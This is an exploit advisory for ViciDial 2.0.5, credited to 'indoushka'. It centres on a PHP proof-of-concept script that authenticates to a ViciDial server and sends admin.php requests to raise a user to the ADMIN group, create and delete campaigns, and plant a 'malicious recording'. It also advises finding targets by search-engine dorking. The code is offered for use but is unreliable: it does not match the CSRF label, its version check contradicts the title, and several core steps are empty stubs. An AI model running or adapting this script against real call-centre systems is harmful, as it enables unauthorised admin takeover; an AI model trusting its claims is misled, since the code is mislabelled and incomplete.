Headline
ViciDial 2.0.5 Cross Site Request Forgery
ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code add new admin .[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass VICIdialExploit { private $username; private $password; private $targetUri; private $headers; public function __construct($username, $password, $targetUri) { $this->username = $username; $this->password = $password; $this->targetUri = $targetUri; $this->headers = array( 'Authorization' => 'Basic ' . base64_encode($username . ':' . $password) ); } public function check() { $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php'); if ($response['code'] != 200) { return 'Unknown'; } $version_info = $this->extractVersion($response['body']); if (!$version_info) { return 'Unknown'; } $current_version = $this->compareVersion($version_info, '2.14-917a'); return ($current_version <= 0) ? 'Vulnerable' : 'Safe'; } private function extractVersion($html) { preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches); return isset($matches[0]) ? $matches[0] : null; } private function compareVersion($current, $vulnerable) { return version_compare($current, $vulnerable); } public function exploit() { $this->startService(); $this->authenticateAdmin(); $this->updateUserSettings(); $this->updateSystemSettings(); $campaignData = $this->createDummyCampaign(); $this->updateCampaignSettings($campaignData['id']); $this->createDummyList($campaignData['list_name'], $campaignData['id']); $phoneCreds = $this->fetchPhoneCredentials(); $this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']); $this->insertMaliciousRecording($phoneCreds['recording_extension']); $this->deleteDummyCampaign($campaignData['id']); $this->waitForCronJob(); } private function startService() { // Starting HTTP service logic } private function sendRequest($method, $url, $body = null) { $options = array( 'http' => array( 'method' => $method, 'header' => implode("\r\n", $this->headers) ) ); if ($body) { $options['http']['content'] = http_build_query($body); } $context = stream_context_create($options); $result = file_get_contents($url, false, $context); return array( 'code' => $http_response_header[0], 'body' => $result ); } private function authenticateAdmin() { $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username)); if ($response['code'] != 200) { throw new Exception('Failed to authenticate with credentials.'); } echo 'Authenticated successfully as user ' . $this->username; } private function updateUserSettings() { $faker = new Faker\Generator(); $userSettings = array( 'ADD' => '4A', 'user' => $this->username, 'pass' => $this->password, 'full_name' => $faker->name, 'user_group' => 'ADMIN', 'phone_login' => $faker->userName, 'phone_pass' => $faker->password, 'active' => 'Y', 'vicidial_recording' => '1' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings); echo 'Updated user settings'; } private function updateSystemSettings() { // Fetching system settings logic and making changes } private function createDummyCampaign() { $faker = new Faker\Generator(); $campaignId = rand(100000, 999999); $listId = $campaignId + 1; $campaignName = $faker->company; $campaignSettings = array( 'ADD' => '21', 'campaign_id' => $campaignId, 'campaign_name' => $campaignName, 'user_group' => '---ALL---', 'active' => 'Y' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings); echo 'Created dummy campaign ' . $campaignName; return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId); } private function updateCampaignSettings($campaignId) { $campaignSettings = array( 'ADD' => '41', 'campaign_id' => $campaignId, 'active' => 'Y', 'auto_dial_level' => '1' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings); echo 'Updated dummy campaign settings'; } private function createDummyList($listName, $campaignId) { $listSettings = array( 'ADD' => '211', 'list_name' => $listName, 'campaign_id' => $campaignId, 'active' => 'Y' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings); echo 'Created dummy list ' . $listName; } private function fetchPhoneCredentials() { // Fetching phone credentials logic } private function agentPortalAuthentication($extension, $password, $campaignId) { // Agent portal authentication logic } private function insertMaliciousRecording($recordingExtension) { // Inserting malicious recording logic } private function deleteDummyCampaign($campaignId) { $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES')); echo 'Deleted dummy campaign ' . $campaignId; } private function waitForCronJob() { // Waiting for cron job logic }}// Usage example:$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');$exploit->check();$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================